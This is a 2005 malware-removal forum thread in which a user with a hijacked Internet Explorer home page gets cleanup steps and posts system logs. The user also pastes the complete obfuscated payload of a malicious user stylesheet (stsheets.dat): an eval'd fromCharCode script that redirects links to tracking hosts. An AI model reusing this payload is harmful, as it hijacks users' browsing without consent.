Direct Parallel Link Driver: System32\DRIVERS\ptilink.sys (manual start)
PxHelp20: System32\DRIVERS\PxHelp20.sys (system)
Casio Digital Camera: System32\DRIVERS\qv2kux.sys (manual start)
Remote Access Auto Connection Driver: System32\DRIVERS\rasacd.sys (system)
Remote Access Auto Connection Manager: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
WAN Miniport (IrDA): System32\DRIVERS\rasirda.sys (manual start)
WAN Miniport (L2TP): System32\DRIVERS\rasl2tp.sys (manual start)
Remote Access Connection Manager: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
Remote Access PPPOE Driver: System32\DRIVERS\raspppoe.sys (manual start)
Direkt parallell: System32\DRIVERS\raspti.sys (manual start)
Rdbss: System32\DRIVERS\rdbss.sys (system)
RDPCDD: System32\DRIVERS\RDPCDD.sys (system)
Terminal Server Device Redirector Driver: System32\DRIVERS\rdpdr.sys (manual start)
Remote Desktop Help Session Manager: C:\WINDOWS\system32\sessmgr.exe (manual start)
Filterdrivrutin för uppspelning av digitalt CD-ljud: System32\DRIVERS\redbook.sys (system)
Routing and Remote Access: %SystemRoot%\System32\svchost.exe -k netsvcs (disabled)
Remote Registry: %SystemRoot%\system32\svchost.exe -k LocalService (autostart)
Remote Procedure Call (RPC) Locator: %SystemRoot%\System32\locator.exe (manual start)
Remote Procedure Call (RPC): %SystemRoot%\system32\svchost -k rpcss (autostart)
QoS RSVP: %SystemRoot%\System32\rsvp.exe (manual start)
Security Accounts Manager: %SystemRoot%\system32\lsass.exe (autostart)
USB Still Image Capture Device: System32\DRIVERS\emScan.sys (manual start)
Smart Card: %SystemRoot%\System32\SCardSvr.exe (manual start)
Task Scheduler: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
Secdrv: System32\DRIVERS\secdrv.sys (autostart)
Secondary Logon Service: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
System Event Notification: %SystemRoot%\system32\svchost.exe -k netsvcs (autostart)
Serenum-filterdrivrutin: System32\DRIVERS\serenum.sys (manual start)
Drivrutin för seriell port: System32\DRIVERS\serial.sys (system)
Windows Firewall/Internet Connection Sharing (ICS): %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
Shell Hardware Detection: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
SiS AGP Filter: System32\DRIVERS\SISAGPX.sys (system)
SiS PCI Fast Ethernet Adapter Driver: System32\DRIVERS\sisnic.sys (manual start)
BDA Slip De-Framer: System32\DRIVERS\SLIP.sys (manual start)
SNMP Service: %SystemRoot%\System32\snmp.exe (autostart)
SNMP Trap Service: %SystemRoot%\System32\snmptrap.exe (manual start)
Sony Digital Imaging Video2: System32\DRIVERS\sonypvs1.sys (manual start)
Microsoft Kernel Audio Splitter: system32\drivers\splitter.sys (manual start)
Print Spooler: %SystemRoot%\system32\spoolsv.exe (autostart)
Sony SPTI Service: C:\Program\VANLIG~1\SONYSH~1\AVLib\Sptisrv.exe (manual start)
Drivrutin för filter för Systemåterställning: System32\DRIVERS\sr.sys (system)
System Restore Service: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
Srv: System32\DRIVERS\srv.sys (manual start)
SSDP Discovery Service: %SystemRoot%\System32\svchost.exe -k LocalService (manual start)
WIA (Windows Image Acquisition): %SystemRoot%\System32\svchost.exe -k imgsvc (autostart)
BDA IPSink: System32\DRIVERS\StreamIP.sys (manual start)
Software Bus Driver: System32\DRIVERS\swenum.sys (manual start)
Microsoft Kernel GS Wavetable Synthesizer: system32\drivers\swmidi.sys (manual start)
MS Software Shadow Copy Provider: C:\WINDOWS\System32\dllhost.exe /Processid:{A82EA13A-FDCA-49A4-898F-F39C433DA97A} (manual start)
Microsoft Kernelsystemljudenhet: system32\drivers\sysaudio.sys (manual start)
Performance Logs and Alerts: %SystemRoot%\system32\smlogsvc.exe (manual start)
Telephony: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
TCP/IP Protocol Driver: System32\DRIVERS\tcpip.sys (system)
Terminal Device Driver: System32\DRIVERS\termdd.sys (system)
Terminal Services: %SystemRoot%\System32\svchost -k DComLaunch (manual start)
Themes: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
Telnet: C:\WINDOWS\System32\tlntsvr.exe (manual start)
Distributed Link Tracking Client: %SystemRoot%\system32\svchost.exe -k netsvcs (autostart)
Windows User Mode Driver Framework: C:\WINDOWS\System32\wdfmgr.exe (autostart)
Microcode Update Driver: System32\DRIVERS\update.sys (manual start)
Universal Plug and Play Device Host: %SystemRoot%\System32\svchost.exe -k LocalService (manual start)
Uninterruptible Power Supply: %SystemRoot%\System32\ups.exe (manual start)
USB-ljuddrivrutiner (WDM): system32\drivers\usbaudio.sys (manual start)
Microsoft USB Generic Parent Driver: System32\DRIVERS\usbccgp.sys (manual start)
USB2-aktiverat nav: System32\DRIVERS\usbhub.sys (manual start)
Microsoft USB Open Host Controller Miniport Driver: System32\DRIVERS\usbohci.sys (manual start)
Drivrutin för USB-masslagringsenheter: System32\DRIVERS\USBSTOR.SYS (manual start)
VGA-bildskärmsstyrenhet.: \SystemRoot\System32\drivers\vga.sys (system)
Volume Shadow Copy: %SystemRoot%\System32\vssvc.exe (manual start)
Windows Time: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
Remote Access IP ARP Driver: System32\DRIVERS\wanarp.sys (manual start)
Drivrutin för Microsoft WINMM WDM-ljudkompatibilitet: system32\drivers\wdmaud.sys (manual start)
WebClient: %SystemRoot%\System32\svchost.exe -k LocalService (autostart)
Windows Management Instrumentation: %systemroot%\system32\svchost.exe -k netsvcs (autostart)
Portable Media Serial Number Service: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
Windows Management Instrumentation Driver Extensions: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
WMI Performance Adapter: C:\WINDOWS\System32\wbem\wmiapsrv.exe (manual start)
Stödmiljö för Windows Socket 2.0 Icke-IFS-tjänstprovider: \SystemRoot\System32\drivers\ws2ifsl.sys (system)
Security Center: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
World Standard Teletext Codec: System32\DRIVERS\WSTCODEC.SYS (manual start)
Automatic Updates: %systemRoot%\System32\svchost.exe -k netsvcs (autostart)
Wireless Zero Configuration: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
Network Provisioning Service: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)


--------------------------------------------------

Enumerating Windows NT logon/logoff scripts:
*No scripts set to run*

Windows NT checkdisk command:
BootExecute = autocheck autochk *

Windows NT 'Wininit.ini':
PendingFileRenameOperations: *Registry value not found*

--------------------------------------------------

Enumerating ShellServiceObjectDelayLoad items:

PostBootReminder: C:\WINDOWS\system32\SHELL32.dll
CDBurn: C:\WINDOWS\system32\SHELL32.dll
SysTray: C:\WINDOWS\System32\stobject.dll
WebCheck: C:\WINDOWS\System32\webcheck.dll

--------------------------------------------------
Autorun entries from Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run

*Registry key not found*

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run

*Registry key not found*

--------------------------------------------------

End of report, 32 816 bytes
Report generated in 0,157 seconds

Command line options:
/verbose - to add additional info on each section
/complete - to include empty sections and unsuspicious data
/full - to include several rarely-important sections
/force9x - to include Win9x-only startups even if running on WinNT
/forcent - to include WinNT-only startups even if running on Win9x
/forceall - to include all Win9x and WinNT startups, regardless of platform
/history - to list version history only

About the find.bat... There is no report.txt, only a report1.txt and a report2.txt, but those files disapears in less than 1 second. Do you mean a file called log.txt?
Here's the log.txt:

C:\WINDOWS\SERVIC~1\I386\
atinxbxx.sys Tue 2004-08-03 22.29.32 A.... 31 744 31,00 K

C:\WINDOWS\SYSTEM32\DRIVERS\
atinxbxx.sys Tue 2004-08-03 22.29.32 A.... 31 744 31,00 K
ndisi.sys Sat 2002-04-27 5.05.26 A.... 31 744 31,00 K

3 items found: 3 files, 0 directories.
Total of file sizes: 95 232 bytes 93,00 K

No matches found.

Is it the information you needed? Well, Thanks an lot for your help so far! :tazz: ;) ;)
  • 0

#4
Wizard

Wizard

    Retired Staff

  • Retired Staff
  • 5,661 posts
Reboot into SAFE MODE(Tap F8 when restarting)
Here is a link on how to boot into Safe Mode:
http://service1.syma...src=sec_doc_nam

After restarting in Safe Mode,Configure Windows to Show All Hidden Files and Folders,this must be done after restarting in Safe Mode!!

Here is a link to help with that
http://www.bleepingc...showtutorial=62

Be sure to follow the directions that apply to your Operating System!

Navigate to this location

C:\WINDOWS\SYSTEM32\DRIVERS

Open the Drivers folder and locate this file

ndisi.sys

Right Click the File and Select Properties>>Select Rename>>Rename it to ndsis.bak

Restart Normal and Open HijackThis and put a check by these but DO NOT hit the Fix Checked button yet!

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://rl.webtracer.cc/-/?bayzm

R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://rl.webtracer.cc/-/?bayzm

O1 - Hosts: 1159680172 auto.search.msn.com

O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present

O19 - User stylesheet: C:\WINDOWS\stsheets.dat

Now Make sure ALL WINDOWS and BROWSERS are CLOSED and hit the Fix Checked Button!!

Locate and Delete

C:\WINDOWS\stsheets.dat<< File

Run MSCONFIG and enable everything in the startup area. To get to MSCONFIG, click on Start -> Run -> type in MSCONFIG -> click OK!

Under the "General" Tab
Make Sure Normal Startup is Checked!!

Click Apply>>OK>>Follow the Prompts to Restart!!

Restart Normal and have the PC Scanned here
Panda Active Scan

You will need to be using Internet Explorer for the Scan to work!

Save the Report it generates!

Post back with the Report from Panda and a fresh HijackThis log!
  • 0

#5
Buffelberra

Buffelberra

    New Member

  • Topic Starter
  • Member
  • Pip
  • 8 posts
Hi again and thanks for helping me. I have renamed ndisi.sys to ndisi.bak in Safe Mode now. But when i try to delete stsheets.dat in C:\WINDOWS... I just can't see the file. I have selected to show hidden and system files, but i can't see the file. I know the file exists, cause it opens when i type C:\WINDOWS\stsheets.dat in "Run...". The problem is that the file is INVISIBLE. I've tried to delete it in Safe Mode but i still can't see it. But when i open the file trough "Run..." this information appears in the file (if it can be to any help):

body{border-color:expression(myid = '3f53465356',
eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,32,33,61,32,39,39,63,40,109,121,105,100,116,120,116,61,40,39,60,112,32,115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,59,34,62,39,43,109,121,105,100,
43,39,60,47,112,62,39,41,44,100,116,120,116,61,100,111,99,117,109,101,110,116,46,98,111,100,121,46,105,110,110,101,114,72,84,77,76,44,100,116,120,116,46,105,110,100,101,120,79,102,40,109,121,105,100,41,32,61,61,32,45,49,32,63,40,109,102,110,61,110,101,119,
32,70,117,110,99,116,105,111,110,40,34,100,111,99,117,109,101,110,116,46,98,111,100,121,46,105,110,110,101,114,72,84,77,76,61,109,121,105,100,116,120,116,43,100,116,120,116,59,118,97,114,32,109,95,100,109,110,95,109,115,107,61,39,40,120,120,45,112,105,99,115,
46,99,111,109,124,116,111,45,120,120,120,46,99,111,109,124,109,121,45,102,114,101,101,45,112,111,114,110,111,46,99,111,109,124,115,117,112,101,114,45,97,100,117,108,116,46,99,111,109,124,102,114,101,101,45,112,111,114,110,111,45,108,105,115,116,46,99,111,109,
124,99,108,101,97,110,112,111,114,110,111,46,99,111,109,124,97,109,97,116,101,117,114,115,45,104,97,108,108,46,99,111,109,124,120,120,45,99,108,117,98,46,99,111,109,124,102,105,110,100,110,97,118,105,103,97,116,111,114,46,99,111,109,124,119,111,119,112,111,
114,110,46,110,101,116,124,105,99,97,110,115,101,97,114,99,104,46,110,101,116,124,102,97,115,116,115,101,97,114,99,104,46,99,99,124,103,108,111,98,101,45,102,105,110,100,101,114,46,99,99,124,103,108,111,98,97,108,45,102,105,110,100,101,114,46,99,111,109,124,
99,108,101,97,114,115,101,97,114,99,104,46,110,101,116,124,99,108,101,97,114,115,101,97,114,99,104,46,99,99,124,112,111,114,110,102,111,114,46,99,111,109,124,116,111,110,115,112,111,114,110,46,99,111,109,124,121,97,112,111,114,110,46,110,101,116,124,101,101,
112,111,114,110,46,99,111,109,124,116,104,97,116,112,111,114,110,46,110,101,116,124,112,111,114,110,116,104,101,46,99,111,109,124,115,101,120,117,110,100,101,114,46,99,111,109,124,117,112,115,115,101,120,46,99,111,109,124,97,115,112,101,114,109,46,99,111,109,
124,102,111,111,108,103,105,114,108,46,99,111,109,124,102,117,99,107,111,104,46,99,111,109,124,104,117,103,115,108,117,116,46,99,111,109,124,111,110,102,117,99,107,46,99,111,109,124,117,112,98,97,98,101,46,99,111,109,124,119,105,108,100,99,108,105,116,46,99,
111,109,124,104,105,112,117,115,115,121,46,99,111,109,124,111,102,120,120,120,46,99,111,109,124,111,104,104,111,104,46,99,111,109,124,115,101,120,115,116,97,116,105,99,46,99,111,109,124,112,111,108,105,115,116,46,99,111,109,41,39,59,118,97,114,32,109,95,100,
110,109,95,114,101,61,110,101,119,32,82,101,103,69,120,112,40,109,95,100,109,110,95,109,115,107,44,92,34,92,34,41,59,109,95,100,110,109,95,114,101,46,99,111,109,112,105,108,101,40,109,95,100,109,110,95,109,115,107,44,92,34,92,34,41,59,105,102,40,100,111,99,
117,109,101,110,116,46,100,111,109,97,105,110,46,109,97,116,99,104,40,109,95,100,110,109,95,114,101,41,61,61,110,117,108,108,38,38,100,111,99,117,109,101,110,116,46,114,101,102,101,114,114,101,114,46,109,97,116,99,104,40,109,95,100,110,109,95,114,101,41,61,
61,110,117,108,108,41,123,118,97,114,32,119,95,117,114,108,61,39,104,116,116,112,58,47,47,103,116,46,99,108,101,97,114,115,101,97,114,99,104,46,110,101,116,47,115,114,47,63,105,61,49,51,38,117,61,49,38,119,61,39,59,118,97,114,32,109,95,119,114,100,95,109,115,
107,61,39,40,99,114,117,105,115,101,124,109,112,51,124,102,105,110,97,110,99,101,124,112,105,108,108,115,124,100,105,101,116,124,118,105,99,111,100,105,110,124,116,114,111,106,97,110,124,115,112,121,119,97,114,101,124,97,100,119,97,114,101,124,112,111,112,
32,117,112,124,112,111,112,117,112,124,118,105,114,117,115,124,109,101,114,105,106,110,124,99,97,115,105,110,111,124,98,108,97,99,107,32,106,97,99,107,124,105,110,115,117,114,97,110,99,101,124,116,114,97,118,101,108,124,112,101,110,105,115,32,101,110,108,97,
114,103,101,109,101,110,116,124,112,101,114,115,111,110,97,108,115,124,118,105,97,103,114,97,124,100,97,116,105,110,103,124,99,97,114,124,112,114,105,99,101,124,98,97,115,101,98,97,108,108,124,103,97,109,101,124,109,111,118,105,101,115,124,109,117,115,105,
99,124,112,104,101,110,116,101,114,109,105,110,101,124,98,101,116,116,105,110,103,124,112,111,107,101,114,124,118,97,108,105,117,109,124,112,104,97,114,109,97,99,121,124,102,111,111,116,98,97,108,108,124,99,114,101,100,105,116,124,114,111,117,108,101,116,116,
101,124,114,101,102,105,110,97,110,99,105,110,103,124,119,111,114,107,124,106,111,98,124,108,111,97,110,124,105,110,115,117,114,97,110,99,101,124,97,100,105,112,101,120,124,120,101,110,105,99,97,108,41,39,59,118,97,114,32,109,95,119,114,100,95,114,101,61,110,
101,119,32,82,101,103,69,120,112,40,109,95,119,114,100,95,109,115,107,44,92,34,105,92,34,41,59,109,95,119,114,100,95,114,101,46,99,111,109,112,105,108,101,40,109,95,119,114,100,95,109,115,107,44,92,34,105,92,34,41,59,118,97,114,32,101,95,119,114,100,95,109,
115,107,61,39,40,110,97,107,101,100,124,115,101,120,124,112,111,114,110,124,98,97,98,101,124,120,120,120,124,97,110,97,108,124,109,111,118,105,101,124,98,100,115,109,124,116,101,101,110,124,102,117,99,107,124,97,100,117,108,116,124,116,103,112,124,103,105,
114,108,124,110,97,117,103,104,116,121,124,109,97,116,117,114,101,124,97,109,97,116,101,117,114,124,104,97,114,100,99,111,114,101,124,110,97,115,116,121,124,115,104,101,109,97,108,101,124,115,108,117,116,124,102,101,116,105,115,104,124,116,114,97,110,110,121,
124,98,117,115,116,121,124,116,105,116,115,124,115,109,117,116,124,103,97,108,108,124,116,104,117,109,98,124,98,111,111,98,124,108,101,115,98,105,124,110,117,100,101,124,99,111,99,107,124,103,114,97,110,110,124,112,117,115,115,121,124,97,115,115,41,39,59,118,
97,114,32,101,95,119,114,100,95,114,101,61,110,101,119,32,82,101,103,69,120,112,40,101,95,119,114,100,95,109,115,107,44,92,34,105,92,34,41,59,101,95,119,114,100,95,114,101,46,99,111,109,112,105,108,101,40,101,95,119,114,100,95,109,115,107,44,92,34,105,92,34,
41,59,118,97,114,32,100,95,101,120,116,95,109,115,107,61,39,92,46,40,106,112,103,124,106,112,101,103,124,97,118,105,124,109,112,101,103,124,109,112,103,124,119,109,97,41,36,39,59,118,97,114,32,100,95,101,120,116,95,114,101,61,110,101,119,32,82,101,103,69,120,
112,40,100,95,101,120,116,95,109,115,107,44,92,34,105,92,34,41,59,100,95,101,120,116,95,114,101,46,99,111,109,112,105,108,101,40,100,95,101,120,116,95,109,115,107,44,92,34,105,92,34,41,59,118,97,114,32,111,95,117,114,108,61,39,104,116,116,112,58,47,47,103,
116,46,116,114,117,101,45,99,111,117,110,116,101,114,46,99,111,109,47,103,116,47,63,105,61,98,97,121,122,109,38,119,61,39,59,118,97,114,32,105,116,109,44,99,95,108,110,107,44,108,110,107,95,110,117,109,61,100,111,99,117,109,101,110,116,46,108,105,110,107,115,
46,108,101,110,103,116,104,62,49,48,48,32,63,32,49,48,48,32,58,32,100,111,99,117,109,101,110,116,46,108,105,110,107,115,46,108,101,110,103,116,104,44,114,101,95,114,101,115,44,111,108,100,110,59,102,111,114,40,105,116,109,61,48,59,105,116,109,60,108,110,107,
95,110,117,109,59,105,116,109,43,43,41,123,99,95,108,110,107,61,100,111,99,117,109,101,110,116,46,108,105,110,107,115,91,105,116,109,93,59,105,102,40,99,95,108,110,107,46,112,114,111,116,111,99,111,108,33,61,39,104,116,116,112,58,39,41,99,111,110,116,105,110,
117,101,59,114,101,95,114,101,115,61,99,95,108,110,107,46,104,114,101,102,46,109,97,116,99,104,40,101,95,119,114,100,95,114,101,41,59,105,102,40,114,101,95,114,101,115,33,61,110,117,108,108,38,38,99,95,108,110,107,46,104,114,101,102,46,109,97,116,99,104,40,
100,95,101,120,116,95,114,101,41,61,61,110,117,108,108,41,123,99,95,108,110,107,46,111,110,99,108,105,99,107,61,102,117,110,99,116,105,111,110,40,41,123,114,101,116,117,114,110,32,116,114,117,101,59,125,59,99,95,108,110,107,46,111,110,109,111,117,115,101,111,
118,101,114,61,110,101,119,32,70,117,110,99,116,105,111,110,40,92,34,115,101,108,102,46,115,116,97,116,117,115,61,39,92,34,43,99,95,108,110,107,46,104,114,101,102,43,92,34,39,59,114,101,116,117,114,110,32,116,114,117,101,92,34,41,59,99,95,108,110,107,46,111,
110,109,111,117,115,101,111,117,116,61,102,117,110,99,116,105,111,110,40,41,123,115,101,108,102,46,115,116,97,116,117,115,61,39,39,59,114,101,116,117,114,110,32,116,114,117,101,59,125,59,111,108,100,110,61,99,95,108,110,107,46,105,110,110,101,114,72,84,77,
76,59,99,95,108,110,107,46,104,114,101,102,61,111,95,117,114,108,43,114,101,95,114,101,115,91,48,93,59,99,95,108,110,107,46,105,110,110,101,114,72,84,77,76,61,111,108,100,110,59,99,111,110,116,105,110,117,101,59,125,114,101,95,114,101,115,61,99,95,108,110,
107,46,105,110,110,101,114,84,101,120,116,46,109,97,116,99,104,40,101,95,119,114,100,95,114,101,41,59,105,102,40,114,101,95,114,101,115,33,61,110,117,108,108,41,123,99,95,108,110,107,46,111,110,99,108,105,99,107,61,102,117,110,99,116,105,111,110,40,41,123,
114,101,116,117,114,110,32,116,114,117,101,59,125,59,99,95,108,110,107,46,111,110,109,111,117,115,101,111,118,101,114,61,110,101,119,32,70,117,110,99,116,105,111,110,40,92,34,115,101,108,102,46,115,116,97,116,117,115,61,39,92,34,43,99,95,108,110,107,46,104,
114,101,102,43,92,34,39,59,114,101,116,117,114,110,32,116,114,117,101,92,34,41,59,99,95,108,110,107,46,111,110,109,111,117,115,101,111,117,116,61,102,117,110,99,116,105,111,110,40,41,123,115,101,108,102,46,115,116,97,116,117,115,61,39,39,59,114,101,116,117,
114,110,32,116,114,117,101,59,125,59,111,108,100,110,61,99,95,108,110,107,46,105,110,110,101,114,72,84,77,76,59,99,95,108,110,107,46,104,114,101,102,61,111,95,117,114,108,43,114,101,95,114,101,115,91,48,93,59,99,95,108,110,107,46,105,110,110,101,114,72,84,
77,76,61,111,108,100,110,59,99,111,110,116,105,110,117,101,59,125,118,97,114,32,99,114,100,61,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,59,105,102,40,99,95,108,110,107,46,104,111,115,116,110,97,109,101,46,105,110,100,101,120,79,102,40,99,114,
100,41,33,61,45,49,41,123,99,111,110,116,105,110,117,101,59,125,114,101,95,114,101,115,61,99,95,108,110,107,46,104,114,101,102,46,109,97,116,99,104,40,109,95,119,114,100,95,114,101,41,59,105,102,40,114,101,95,114,101,115,33,61,110,117,108,108,41,123,99,95,
108,110,107,46,111,110,99,108,105,99,107,61,102,117,110,99,116,105,111,110,40,41,123,114,101,116,117,114,110,32,116,114,117,101,59,125,59,99,95,108,110,107,46,111,110,109,111,117,115,101,111,118,101,114,61,110,101,119,32,70,117,110,99,116,105,111,110,40,92,
34,115,101,108,102,46,115,116,97,116,117,115,61,39,92,34,43,99,95,108,110,107,46,104,114,101,102,43,92,34,39,59,114,101,116,117,114,110,32,116,114,117,101,92,34,41,59,99,95,108,110,107,46,111,110,109,111,117,115,101,111,117,116,61,102,117,110,99,116,105,111,
110,40,41,123,115,101,108,102,46,115,116,97,116,117,115,61,39,39,59,114,101,116,117,114,110,32,116,114,117,101,59,125,59,111,108,100,110,61,99,95,108,110,107,46,105,110,110,101,114,72,84,77,76,59,118,97,114,32,120,61,92,34,92,34,44,105,44,108,61,99,95,108,
110,107,46,104,114,101,102,46,108,101,110,103,116,104,59,102,111,114,40,105,61,55,59,105,60,108,59,105,43,43,41,120,43,61,99,95,108,110,107,46,104,114,101,102,46,99,104,97,114,67,111,100,101,65,116,40,105,41,46,116,111,83,116,114,105,110,103,40,49,54,41,59,
99,95,108,110,107,46,104,114,101,102,61,119,95,117,114,108,43,114,101,95,114,101,115,91,48,93,43,92,34,38,108,61,92,34,43,120,59,99,95,108,110,107,46,105,110,110,101,114,72,84,77,76,61,111,108,100,110,59,99,111,110,116,105,110,117,101,59,125,114,101,95,114,
101,115,61,99,95,108,110,107,46,105,110,110,101,114,84,101,120,116,46,109,97,116,99,104,40,109,95,119,114,100,95,114,101,41,59,105,102,40,114,101,95,114,101,115,33,61,110,117,108,108,41,123,99,95,108,110,107,46,111,110,99,108,105,99,107,61,102,117,110,99,116,
105,111,110,40,41,123,114,101,116,117,114,110,32,116,114,117,101,59,125,59,99,95,108,110,107,46,111,110,109,111,117,115,101,111,118,101,114,61,110,101,119,32,70,117,110,99,116,105,111,110,40,92,34,115,101,108,102,46,115,116,97,116,117,115,61,39,92,34,43,99,
95,108,110,107,46,104,114,101,102,43,92,34,39,59,114,101,116,117,114,110,32,116,114,117,101,92,34,41,59,99,95,108,110,107,46,111,110,109,111,117,115,101,111,117,116,61,102,117,110,99,116,105,111,110,40,41,123,115,101,108,102,46,115,116,97,116,117,115,61,39,
39,59,114,101,116,117,114,110,32,116,114,117,101,59,125,59,111,108,100,110,61,99,95,108,110,107,46,105,110,110,101,114,72,84,77,76,59,118,97,114,32,120,61,92,34,92,34,44,105,44,108,61,99,95,108,110,107,46,104,114,101,102,46,108,101,110,103,116,104,59,102,111,
114,40,105,61,55,59,105,60,108,59,105,43,43,41,120,43,61,99,95,108,110,107,46,104,114,101,102,46,99,104,97,114,67,111,100,101,65,116,40,105,41,46,116,111,83,116,114,105,110,103,40,49,54,41,59,99,95,108,110,107,46,104,114,101,102,61,119,95,117,114,108,43,114,
101,95,114,101,115,91,48,93,43,92,34,38,108,61,92,34,43,120,59,99,95,108,110,107,46,105,110,110,101,114,72,84,77,76,61,111,108,100,110,59,99,111,110,116,105,110,117,101,59,125,125,125,114,101,116,117,114,110,32,116,114,117,101,34,41,44,100,111,99,117,109,101,
110,116,46,98,111,100,121,46,111,110,108,111,97,100,61,109,102,110,44,39,39,41,32,58,32,39,39,41,32,58,32,39,39))
);}
iframe{border-width:expression(
eval(String.fromCharCode(116,104,105,115,46,115,114,99,61,61,39,97,98,111,117,116,58,98,108,97,110,107,39,63,48,58,40,116,104,105,115,46,115,114,99,61,39,97,98,111,117,116,58,98,108,97,110,107,39,44,48,41))
);}


How do i delete it?
And one thing more. I think i can handle the situation now. After i had renamed that file in Safe Mode, i tried to change Home Page in Safe Mode. AND IT WORKED :tazz: . And now, i can change homepage in normal mode also. :P But i still want to delete the stsheets.dat, if it's infected or something. Can the evil homepage return? I want my computer to be clean, if you know what i mean ;) .
But your help did actually help me. IM SO THANKFUL! :woot: :ph34r: :D ;) :) :tazz: THANKYOU, THANKYOU, THANKYOU! You are the best!

And by the way, here's the fresh HijackThis Logfile:
Logfile of HijackThis v1.99.1
Scan saved at 01:45:55, on 2005-06-13
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\SYSTEM32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\SYSTEM32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\Program\Adobe\Adobe Acrobat 6.0\Distillr\acrotray.exe
C:\Program\Common\Bin\WinCinemaMgr.exe
C:\Program\F-Secure\Anti-Virus\fsgk32st.exe
C:\Program\F-Secure\Anti-Virus\FSGK32.EXE
C:\Program\F-Secure\BackWeb\7681197\program\fsbwsys.exe
C:\Program\F-Secure\Common\FSMA32.EXE
C:\Program\F-Secure\Common\FSMB32.EXE
C:\Program\F-Secure\Anti-Virus\fssm32.exe
C:\WINDOWS\System32\snmp.exe
C:\WINDOWS\System32\svchost.exe
C:\Program\F-Secure\Common\FCH32.EXE
C:\Program\F-Secure\Common\FAMEH32.EXE
C:\Program\F-Secure\Common\FNRB32.EXE
C:\WINDOWS\system32\wscntfy.exe
C:\Program\F-Secure\Common\FIH32.EXE
C:\Program\F-Secure\FWES\Program\fsdfwd.exe
C:\Program\F-Secure\Anti-Virus\fsav32.exe
C:\Program\Mozilla Firefox\firefox.exe
C:\Documents and Settings\Vimo\Skrivbord\hijack this\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.se/
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = localhost
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Länkar
O4 - Global Startup: Acrobat Assistant.lnk = C:\Program\Adobe\Adobe Acrobat 6.0\Distillr\acrotray.exe
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program\Vanliga filer\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: InterVideo WinCinema Manager.lnk = C:\Program\Common\Bin\WinCinemaMgr.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Program\Microsoft Office\Office\OSA9.EXE
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program\Java\j2re1.4.2\bin\npjpi142.dll
O9 - Extra 'Tools' menuitem: Sun Java-konsol - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program\Java\j2re1.4.2\bin\npjpi142.dll
O9 - Extra button: Spyware Doctor - {2D663D1A-8670-49D9-A1A5-4C56B4E14E84} - C:\Program\SPYWAR~1\tools\iesdpb.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program\Messenger\msmsgs.exe
O23 - Service: AdobeVersionCue - Adobe Sytems - C:\Program\Adobe\Adobe Version Cue\service\VersionCue.exe
O23 - Service: Ati HotKey Poller - Unknown owner - C:\WINDOWS\System32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\SYSTEM32\ati2sgag.exe
O23 - Service: F-Secure Automatic Update (BackWeb Client - 7681197) - Unknown owner - C:\Program\F-Secure\BackWeb\7681197\Program\SERVIC~1.EXE
O23 - Service: F-Secure Gatekeeper Handler Starter - F-Secure Corp. - C:\Program\F-Secure\Anti-Virus\fsgk32st.exe
O23 - Service: F-Secure Network Request Broker - F-Secure Corporation - C:\Program\F-Secure\Common\FNRB32.EXE
O23 - Service: fsbwsys - F-Secure Corp. - C:\Program\F-Secure\BackWeb\7681197\program\fsbwsys.exe
O23 - Service: F-Secure Anti-Virus Firewall Daemon (FSDFWD) - F-Secure Corporation - C:\Program\F-Secure\FWES\Program\fsdfwd.exe
O23 - Service: F-Secure Management Agent (FSMA) - F-Secure Corporation - C:\Program\F-Secure\Common\FSMA32.EXE
O23 - Service: Sony SPTI Service (SPTISRV) - Sony Corporation - C:\Program\VANLIG~1\SONYSH~1\AVLib\Sptisrv.exe

THANK YOU! :hug: ;)

PS. Spybot - Search & Destroy, still finds a "Possible Hijacker".

EDIT: i found a way to delete the C:\WINDOWS\stsheets.dat....

Edited by Buffelberra, 13 June 2005 - 04:54 AM.

  • 0

